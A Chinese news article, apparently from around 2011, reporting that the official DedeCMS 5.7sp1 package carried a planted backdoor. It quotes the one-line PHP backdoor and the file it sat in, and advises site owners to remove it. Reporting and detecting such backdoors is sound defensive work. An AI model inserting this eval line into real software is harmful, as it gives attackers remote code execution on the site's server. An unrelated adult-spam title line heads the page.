成人久草,h片网站在线观看

360建議，使用DedeCMS的網(wǎng)站站長應(yīng)立刻檢測include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));"，如存在應(yīng)刪除該行代碼，如不存在則證明沒有該"一句話后門"。

【IT商業(yè)新聞網(wǎng)訊】日前，織夢內(nèi)容管理系統(tǒng)（DedeCMS）遭烏云漏洞平臺曝光稱，DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測平臺檢測，該后門確實曾一度出現(xiàn)在織夢官網(wǎng)版本中。為此，360于當天緊急推出DedeCMS后門檢測服務(wù)，并已對大批中招網(wǎng)站發(fā)出郵件報警。

360網(wǎng)站安全檢測平臺服務(wù)網(wǎng)址：http://webscan.#

圖1：DedeCms被植入的后門代碼

據(jù)悉，DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個人網(wǎng)站上，是國內(nèi)用戶量最大的PHP類CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn)，此次DedeCMS曝出的后門名為"一句話后門"，其惡意代碼存在于DedeCMS購物車類文件中，凡是調(diào)用該購物車類的文件均會觸發(fā)后門，從而導(dǎo)致整個網(wǎng)站甚至服務(wù)器遭黑客進一步控制。

作為開源軟件，DedeCMS此次曝出后門并非個例。因為在國際上，Linux等多款著名的開源軟件也曾遭黑客植入后門。不過，烏云漏洞平臺公開的織夢官方郵件顯示，織夢開發(fā)團隊否認了產(chǎn)品曾被植入后門，但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進行了修改。

圖2：測試驗證PHP代碼可被DedeCMS后門執(zhí)行

　　推薦閱讀

　　李開復(fù)微博稱中國O2O機會大但并不好做

李開復(fù)在微博寫道：“O2O就是(1)幫助線上用戶發(fā)現(xiàn)和推薦消費場所，(2)為線下服務(wù)業(yè)帶來線上客流，(3)可以檢測效果，最好可以線上支付。美國的O2O往往是幫助已上線的商家拉顧客，但是中國線下商家一般對互聯(lián)網(wǎng)認知和接>>>詳細閱讀

本文標題：DedeCMS官方版本驚曝后門 360緊急推出安全檢測

地址：http://m.sh-jijian.com/a/guandian/yejie/20111230/161793.html

1/2 1 2 下一頁